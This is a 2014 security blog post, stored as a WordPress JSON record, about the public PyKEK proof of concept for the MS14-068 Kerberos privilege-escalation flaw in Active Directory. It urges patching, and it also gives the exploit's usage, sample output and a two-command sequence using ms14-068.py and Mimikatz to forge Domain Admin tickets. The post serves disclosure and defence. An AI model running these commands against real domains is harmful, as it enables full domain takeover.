{"id":660,"date":"2014-12-06T22:17:41","date_gmt":"2014-12-07T03:17:41","guid":{"rendered":"http:\/\/adsecurity.org\/?p=660"},"modified":"2015-12-30T11:51:25","modified_gmt":"2015-12-30T16:51:25","slug":"ms14-068-kerberos-vulnerability-privilege-escalation-poc-posted-pykek","status":"publish","type":"post","link":"https:\/\/adsecurity.org\/?p=660","title":{"rendered":"MS14-068 Kerberos Vulnerability Privilege Escalation POC Posted (PyKEK)"},"content":{"rendered":"<p>As noted in previous posts on <a title=\"MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege\" href=\"https:\/\/adsecurity.org\/?p=525\">MS14-068<\/a>, including a <a title=\"Kerberos Vulnerability in MS14-068 Explained\" href=\"https:\/\/adsecurity.org\/?p=541\">detailed description<\/a>, a Kerberos ticket with an invalid PAC checksum causes an unpatched Domain Controller to accept invalid group membership claims as valid for Active Directory resources. The MS14-068 patch modifies <a title=\"MS14-068: Active Directory Kerberos Vulnerability Patch for Invalid Checksum\" href=\"https:\/\/adsecurity.org\/?p=574\">KDC Kerberos signature validation <\/a>processing on the Domain Controller.<\/p>\n<p>This issue is FAR worse than the Kerberos \u201cGolden Ticket\u201d issue since an attacker doesn\u2019t need the domain Kerberos service account\u00a0<a href=\"https:\/\/adsecurity.org\/?p=483\">(KRBTGT)<\/a> NTLM password hash (only accessible from a Domain Controller with domain-level admin privileges) for exploit. The attacker simply modifies the existing TGT by changing the group membership to have access to everything in Active Directory and creates a specific invalid checksum for the PAC signature causing the DC to validate it.<\/p>\n<p>If you haven&#8217;t installed the MS14-068 patch (released on November 18th, 2014), the exploit code is now available for all to use. Microsoft KB3011780 patches this issue.<strong><br \/>\n<\/strong> <strong>Patch your Domain Controllers Now!<\/strong><\/p>\n<h4><span style=\"text-decoration: underline;\">MS14-068 References:<\/span><\/h4>\n<ul>\n<li><a title=\"MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege\" href=\"https:\/\/adsecurity.org\/?p=525\">AD Kerberos Privilege Elevation Vulnerability: The Issue<\/a><\/li>\n<li><a title=\"Kerberos Vulnerability in MS14-068 Explained\" href=\"https:\/\/adsecurity.org\/?p=541\">Detailed Explanation of MS14-068<\/a><\/li>\n<li><a title=\"Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=676\">Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)<\/a><\/li>\n<li><a title=\"PyKEK Kerberos Packets on the Wire aka How the MS14-068 Exploit Works\" href=\"https:\/\/adsecurity.org\/?p=763\">PyKEK Kerberos Packets on the Wire aka How the MS14-068 Exploit Works<\/a><\/li>\n<\/ul>\n<h4><em><strong>UPDATE: I have successfully tested this MS14-068 exploit in my lab and <a title=\"Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=676\">posted detailed information on how to exploit Kerberos on vulnerable Domain Controllers including WireShark pcaps and DC event logs<\/a>.<\/strong><\/em><\/h4>\n<p>Sylvain Monn\u00e9\u00a0tweeted about his Python code (<a href=\"https:\/\/github.com\/bidord\/pykek\">Python Kerberos Exploitation Kit<\/a> aka PyKEK) late Thursday, December 4th, stating it can be used to exploit the Kerberos vulnerability patched in MS14-068.<\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/MS14068-POC-Tweet.png\"><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-661 aligncenter\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/MS14068-POC-Tweet-300x286.png\" alt=\"MS14068-POC-Tweet\" width=\"300\" height=\"286\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/MS14068-POC-Tweet-300x286.png 300w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/MS14068-POC-Tweet.png 774w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>Note that the POC is effective against Domain Controllers running Windows Server 2008 R2 and earlier. Microsoft noted in the patch release that &#8220;<a href=\"http:\/\/blogs.technet.com\/b\/srd\/archive\/2014\/11\/18\/additional-information-about-cve-2014-6324.aspx\"><em>Windows Server 2012 impact is less vulnerable than previous Windows versions (i.e., it&#8217;s much harder to exploit on Windows Server 2012\/2012R2)<\/em><\/a>&#8221;<\/p>\n<p>The POC is now in MetaSploit.<\/p>\n<p>POC usage example:<\/p>\n<blockquote>\n<pre><code>ms14-068.py -u &lt;userName&gt;@&lt;domainName&gt; -s &lt;userSid&gt; -d &lt;domainControlerAddr&gt;\r\n<\/code><\/pre>\n<pre><code>  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!\r\n  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!\r\n  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!\r\n  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!\r\n  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!\r\n  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!\r\n  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!\r\n  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!\r\n  [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!<\/code><\/pre>\n<\/blockquote>\n<p>According to the PyKEK documentation, the modified TGT now has the following groups included:<\/p>\n<ul>\n<li>Domain Users (513)<\/li>\n<li>Domain Admins (512)<\/li>\n<li>Schema Admins (518)<\/li>\n<li>Enterprise Admins (519)<\/li>\n<li>Group Policy Creator Owners (520)<\/li>\n<\/ul>\n<p>Since the TGT is signed by the KDC Service (<a title=\"Kerberos &amp; KRBTGT: Active Directory\u2019s Domain Kerberos Account\" href=\"https:\/\/adsecurity.org\/?p=483\">KRBTGT domain account<\/a>), it is valid and can be used to access Active Directory resources based on the group membership (which was forged and now validated by the DC).<\/p>\n<p>At this point, one can use <a title=\"Mimikatz and Active Directory Kerberos Attacks\" href=\"https:\/\/adsecurity.org\/?p=556\">Mimikatz <\/a>to use the new TGT to connect to resources.<\/p>\n<p>Two commands are all that&#8217;s necessary to exploit:<\/p>\n<blockquote>\n<pre><code>python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc\r\nmimikatz.exe \"kerberos::ptc TGT_user-a-1@dom-a.loc.ccache\" exit`<\/code><\/pre>\n<\/blockquote>\n<p>&nbsp;<\/p>\n<p><strong>Requirements:<\/strong><\/p>\n<p>The bar is fairly low in order to exploit MS14-068. Effectively admin rights on a single domain-joined computer is all that&#8217;s needed. The other items aren&#8217;t that difficult once this access is attained.<\/p>\n<ul>\n<li>Admin access to a computer joined to the target domain<\/li>\n<li>Access to domain credentials &#8211; a domain user account is fine.<\/li>\n<li><a href=\"https:\/\/www.python.org\/\">Python <\/a>exe&#8217;s on the computer.<\/li>\n<li><a title=\"Mimikatz and Active Directory Kerberos Attacks\" href=\"https:\/\/adsecurity.org\/?p=556\">Mimikatz<\/a> on the computer<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p><span style=\"text-decoration: underline;\"><strong>References:<\/strong><\/span><\/p>\n<ul>\n<li>The Python script MS14-068 POC code: <a href=\"https:\/\/github.com\/bidord\/pykek\">Python Kerberos Exploitation Kit<\/a> (PyKEK)<\/li>\n<\/ul>\n<ul>\n<li><a title=\"Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=676\">Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)<\/a><\/li>\n<li><a title=\"PyKEK Kerberos Packets on the Wire aka How the MS14-068 Exploit Works\" href=\"https:\/\/adsecurity.org\/?p=763\">PyKEK Kerberos Packets on the Wire aka How the MS14-068 Exploit Works<\/a><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>As noted in previous posts on MS14-068, including a detailed description, a Kerberos ticket with an invalid PAC checksum causes an unpatched Domain Controller to accept invalid group membership claims as valid for Active Directory resources. The MS14-068 patch modifies KDC Kerberos signature validation processing on the Domain Controller. This issue is FAR worse than &hellip; <\/p>\n<p><a class=\"more-link btn\" href=\"https:\/\/adsecurity.org\/?p=660\">Continue reading<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,2],"tags":[20,380,337,80,81,331,298,335,295,333,697,332,329,330],"class_list":["post-660","post","type-post","status-publish","format-standard","hentry","category-microsoft-security","category-technical-reference","tag-activedirectory","tag-cve-2014-6324poc","tag-kb3011780","tag-kdc","tag-kerberos","tag-kerberoschecksumvulnerability","tag-kerberoshacking","tag-metasploit","tag-ms14068","tag-ms14068exploitcode","tag-pac","tag-poc","tag-pykek","tag-pythonkerberosexploitationkit","item-wrap"],"_links":{"self":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/660","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=660"}],"version-history":[{"count":17,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/660\/revisions"}],"predecessor-version":[{"id":2342,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/660\/revisions\/2342"}],"wp:attachment":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=660"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=660"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=660"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}